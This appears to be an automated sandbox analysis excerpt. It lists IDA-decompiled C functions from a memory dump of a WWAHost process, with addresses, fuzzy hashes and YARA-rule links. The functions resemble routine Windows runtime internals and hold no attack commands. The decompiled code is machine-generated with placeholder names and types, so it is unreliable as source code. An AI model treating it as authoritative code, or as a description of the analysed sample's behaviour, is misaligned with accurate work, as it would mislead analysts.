                                              0x039ba643
                                              0x039ba64c
                                              0x039ba64c
                                              0x039ba65b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039ba66c
                                              0x0396b057
                                              0x0396b057
                                              0x0396b057
                                              0x0396b046
                                              0x0396b046
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                              • Instruction ID: 587aa773ca2361ea21c0e9a9656c194d5fb34b47143cca067a62919917702efc
                                              • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                              • Instruction Fuzzy Hash: 44018472205A84DFD326DB5DCA88F767BECEB45790F0D44A1F915CB695E638DC40C620
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A21074 Relevance: .0, Instructions: 46COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E03A21074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E03A2165E(__ebx, 0x3a48ae4, (__edx -  *0x3a48b04 >> 0x14) + (__edx -  *0x3a48b04 >> 0x14), __edi, __ecx, (__edx -  *0x3a48b04 >> 0x14) + (__edx -  *0x3a48b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E03A1AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E03977D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E03A0FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                              0x03a21074
                                              0x03a21080
                                              0x03a21082
                                              0x03a2108a
                                              0x03a2108f
                                              0x03a21093
                                              0x03a210ab
                                              0x03a210ab
                                              0x03a210c3
                                              0x03a210cf
                                              0x03a210e1
                                              0x03a210d1
                                              0x03a210da
                                              0x03a210da
                                              0x03a210e9
                                              0x03a210f5
                                              0x03a210f5
                                              0x03a210fe

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e0aabc9de1e1b328625ece424b0fbeb4f189e067b9cc06272d2b21d946f450ab
                                              • Instruction ID: a450549c1af04dd62d1ce73c75b2d442a56177d1b29744788642d8dddbb11707
                                              • Opcode Fuzzy Hash: e0aabc9de1e1b328625ece424b0fbeb4f189e067b9cc06272d2b21d946f450ab
                                              • Instruction Fuzzy Hash: AE012476508741AFC710EF69D944B1ABBE9ABC4310F08862AF88587391EE35D941CBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A0FEC0 Relevance: .0, Instructions: 46COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 59%
                                              			E03A0FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x3a4d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0399FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E03977D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0399B640(E03999AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                              0x03a0fec0
                                              0x03a0fec0
                                              0x03a0fecf
                                              0x03a0fed9
                                              0x03a0fede
                                              0x03a0fee0
                                              0x03a0feeb
                                              0x03a0fef3
                                              0x03a0fef6
                                              0x03a0fef9
                                              0x03a0ff04
                                              0x03a0ff16
                                              0x03a0ff06
                                              0x03a0ff0f
                                              0x03a0ff0f
                                              0x03a0ff21
                                              0x03a0ff22
                                              0x03a0ff24
                                              0x03a0ff29
                                              0x03a0ff3e

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a88e9352d25c4b781c787f3a66c1d63eb2b34c765bdf95eb9601ace701c38a37
                                              • Instruction ID: 7be258403828fef3c1ed9c53284e1a18f00e7a71af07dc2df98eac8350edc2aa
                                              • Opcode Fuzzy Hash: a88e9352d25c4b781c787f3a66c1d63eb2b34c765bdf95eb9601ace701c38a37
                                              • Instruction Fuzzy Hash: 66018875A01308AFDB14DBA9D845FAEB7B8EF84710F004066B901EB280EA749901C794
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A0FE3F Relevance: .0, Instructions: 46COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 59%
                                              			E03A0FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x3a4d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0399FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E03977D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0399B640(E03999AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                              0x03a0fe3f
                                              0x03a0fe3f
                                              0x03a0fe4e
                                              0x03a0fe58
                                              0x03a0fe5d
                                              0x03a0fe5f
                                              0x03a0fe6a
                                              0x03a0fe72
                                              0x03a0fe75
                                              0x03a0fe78
                                              0x03a0fe83
                                              0x03a0fe95
                                              0x03a0fe85
                                              0x03a0fe8e
                                              0x03a0fe8e
                                              0x03a0fea0
                                              0x03a0fea1
                                              0x03a0fea3
                                              0x03a0fea8
                                              0x03a0febd

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0561fe6bdb41d8bd5611f05a3a0a3102cd1261529dc61e48602e4f3450a48d6a
                                              • Instruction ID: 02726ad9c4f7ae8caf4f03b87385eff4255a13cdcf3da2bf487983af9c9b90c1
                                              • Opcode Fuzzy Hash: 0561fe6bdb41d8bd5611f05a3a0a3102cd1261529dc61e48602e4f3450a48d6a
                                              • Instruction Fuzzy Hash: AF018475A05308AFDB14EFA9D845FAEB7B8EF84710F04406AB900EB281EA749901C794
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A28A62 Relevance: .0, Instructions: 44COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 54%
                                              			E03A28A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x3a4d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E03977D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0399B640(E03999AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                              0x03a28a62
                                              0x03a28a71
                                              0x03a28a79
                                              0x03a28a82
                                              0x03a28a85
                                              0x03a28a89
                                              0x03a28a8c
                                              0x03a28a8f
                                              0x03a28a92
                                              0x03a28a95
                                              0x03a28a9f
                                              0x03a28ab1
                                              0x03a28aa1
                                              0x03a28aaa
                                              0x03a28aaa
                                              0x03a28abc
                                              0x03a28abd
                                              0x03a28abf
                                              0x03a28ac4
                                              0x03a28ada

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 576d6102714da22a59d67e0c09f20f3dcbbed344189f1cca336bd485a179c3b1
                                              • Instruction ID: 23afaac208943023a0a6ae4c17d5148813ee6b43885eaab87145ff36103ef56f
                                              • Opcode Fuzzy Hash: 576d6102714da22a59d67e0c09f20f3dcbbed344189f1cca336bd485a179c3b1
                                              • Instruction Fuzzy Hash: 15012C75A0131CAFDB00DFA9D9419AEBBB8EF98710F51405AF904EB341EB34A901CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A28ED6 Relevance: .0, Instructions: 44COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 54%
                                              			E03A28ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x3a4d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E03977D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0399B640(E03999AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                              0x03a28ed6
                                              0x03a28ee5
                                              0x03a28eed
                                              0x03a28ef0
                                              0x03a28efa
                                              0x03a28f03
                                              0x03a28f0c
                                              0x03a28f15
                                              0x03a28f24
                                              0x03a28f27
                                              0x03a28f31
                                              0x03a28f43
                                              0x03a28f33
                                              0x03a28f3c
                                              0x03a28f3c
                                              0x03a28f4e
                                              0x03a28f4f
                                              0x03a28f51
                                              0x03a28f56
                                              0x03a28f69

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 169e12eb28f8f51c5053c20862f9847d95ac6a54486ec1586a9eebcbea8fc0bf
                                              • Instruction ID: f561f467b589481c2dbad05ea161e9f41c98edcb77cf4879e3a659c4b4d28c24
                                              • Opcode Fuzzy Hash: 169e12eb28f8f51c5053c20862f9847d95ac6a54486ec1586a9eebcbea8fc0bf
                                              • Instruction Fuzzy Hash: 5F111E74A002599FDB04DFA8D441BAEFBF4FF48700F0442AAE918EB382E7349940CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0395DB60 Relevance: .0, Instructions: 43COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0395DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0395DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0395E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0395E8B0(__ecx, _t14, 0xfff);
							L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                              0x0395db64
                                              0x0395db66
                                              0x0395db6b
                                              0x0395dbaa
                                              0x0395db71
                                              0x0395db76
                                              0x0395db7a
                                              0x0395dba3
                                              0x0395db7c
                                              0x0395db87
                                              0x0395db8b
                                              0x039b4fa1
                                              0x039b4fb3
                                              0x039b4fb8
                                              0x0395db91
                                              0x0395db96
                                              0x0395db98
                                              0x0395db98
                                              0x0395db8b
                                              0x0395db7a
                                              0x0395db9d
                                              0x0395dba2

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                              • Instruction ID: 7821a2aae65c65f2b98167676841a4a788ca5b71f7e9ccad1cc2ea429b1f3f57
                                              • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                              • Instruction Fuzzy Hash: 3EF0C8376016239BD732DA594880B67B6AB8FC1AA1F190435B9059B244C960884297D0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0395B1E1 Relevance: .0, Instructions: 42COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0395B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E03977D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E03977D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E039D7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                              0x0395b1e8
                                              0x0395b1ea
                                              0x0395b1f3
                                              0x039b4a17
                                              0x0395b1f9
                                              0x0395b1f9
                                              0x0395b1f9
                                              0x0395b201
                                              0x039b4a21
                                              0x039b4a2e
                                              0x00000000
                                              0x00000000
                                              0x039b4a3b
                                              0x039b4a4d
                                              0x039b4a3d
                                              0x039b4a46
                                              0x039b4a46
                                              0x039b4a55
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0395b20a
                                              0x0395b20a
                                              0x0395b20a
                                              0x0395b20a

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                              • Instruction ID: 1a7129e330981a8eaa70dd4e8b31ba7747e912305065d556f025558e9ccf5cda
                                              • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                              • Instruction Fuzzy Hash: 3201F932200684DBE322D75EC909FA9BBECEF91790F0C44A1FD148B6B2D674C840D365
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039EFE87 Relevance: .0, Instructions: 38COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 46%
                                              			E039EFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x3a4d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E03977D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0399B640(E03999AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                              0x039efe96
                                              0x039efe9e
                                              0x039efea1
                                              0x039efead
                                              0x039efeb3
                                              0x039efeb9
                                              0x039efec3
                                              0x039efed5
                                              0x039efec5
                                              0x039efece
                                              0x039efece
                                              0x039efee0
                                              0x039efee1
                                              0x039efee3
                                              0x039efee8
                                              0x039efefb

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ba30ce3ba062d320cbe31bd7da32cde1181f242861b948a5897b610a4f7d160e
                                              • Instruction ID: 039bfd42ae882b7b4fc5aeb4ce5bdc380e85ec0bac02265cf49fe81c87296cda
                                              • Opcode Fuzzy Hash: ba30ce3ba062d320cbe31bd7da32cde1181f242861b948a5897b610a4f7d160e
                                              • Instruction Fuzzy Hash: 1D016274A00308AFCB14DFA8D541A6EB7F4EF48300F14415AA505EF382E635E901CB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A1131B Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 48%
                                              			E03A1131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x3a4d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E03977D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0399B640(E03999AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                              0x03a1131b
                                              0x03a1132a
                                              0x03a11330
                                              0x03a11336
                                              0x03a1133e
                                              0x03a11341
                                              0x03a11344
                                              0x03a1134f
                                              0x03a11361
                                              0x03a11351
                                              0x03a1135a
                                              0x03a1135a
                                              0x03a1136c
                                              0x03a1136d
                                              0x03a1136f
                                              0x03a11374
                                              0x03a11387

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 162f3ffb6f13b8ef9ad2dbaced7f5182b25886392d32d4548594daa2a70d52af
                                              • Instruction ID: 72b3669e334cf4a784f39b4de5246ee406e780ebe26e63a23e8cf8caa7ad8d76
                                              • Opcode Fuzzy Hash: 162f3ffb6f13b8ef9ad2dbaced7f5182b25886392d32d4548594daa2a70d52af
                                              • Instruction Fuzzy Hash: B2013C75A01208AFDB44EFE9D545AAEB7F4FF48700F40405AB905EB381E634AA10CB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A28F6A Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 48%
                                              			E03A28F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x3a4d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E03977D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0399B640(E03999AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                              0x03a28f6a
                                              0x03a28f79
                                              0x03a28f81
                                              0x03a28f84
                                              0x03a28f8b
                                              0x03a28f91
                                              0x03a28f94
                                              0x03a28f9e
                                              0x03a28fb0
                                              0x03a28fa0
                                              0x03a28fa9
                                              0x03a28fa9
                                              0x03a28fbb
                                              0x03a28fbc
                                              0x03a28fbe
                                              0x03a28fc3
                                              0x03a28fd6

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ee0ba61a1e56d80df406d497cc5fae1f7355091746ee0b2397e4bdd9c6333189
                                              • Instruction ID: 4ea85dd98add7d78b2dd9a35ac845808ebf2f631a54966f4480e2779f81e6ec6
                                              • Opcode Fuzzy Hash: ee0ba61a1e56d80df406d497cc5fae1f7355091746ee0b2397e4bdd9c6333189
                                              • Instruction Fuzzy Hash: 4001F475A0121CAFDB04EFA8D545AAEB7F5FF58700F50445AB905EB381EB74EA00CB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A11608 Relevance: .0, Instructions: 34COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 46%
                                              			E03A11608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x3a4d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E03977D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0399B640(E03999AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                              0x03a11608
                                              0x03a11617
                                              0x03a1161d
                                              0x03a11625
                                              0x03a11628
                                              0x03a1162b
                                              0x03a11636
                                              0x03a11648
                                              0x03a11638
                                              0x03a11641
                                              0x03a11641
                                              0x03a11653
                                              0x03a11654
                                              0x03a11656
                                              0x03a1165b
                                              0x03a1166e

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0fe592b33905f977c01939af4c411bc2bcfc1f8f7df4a34805c5081d50e173d7
                                              • Instruction ID: 7b52f53b7214654fe27938d5c2b37f8fdb1eb4c087d784a68afc6fd7f97b15ff
                                              • Opcode Fuzzy Hash: 0fe592b33905f977c01939af4c411bc2bcfc1f8f7df4a34805c5081d50e173d7
                                              • Instruction Fuzzy Hash: EDF06D75A11348EFDB14EFE8D405AAEB7F4EF58300F04406AA915EB381EA35A900CB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0397C577 Relevance: .0, Instructions: 33COMMON
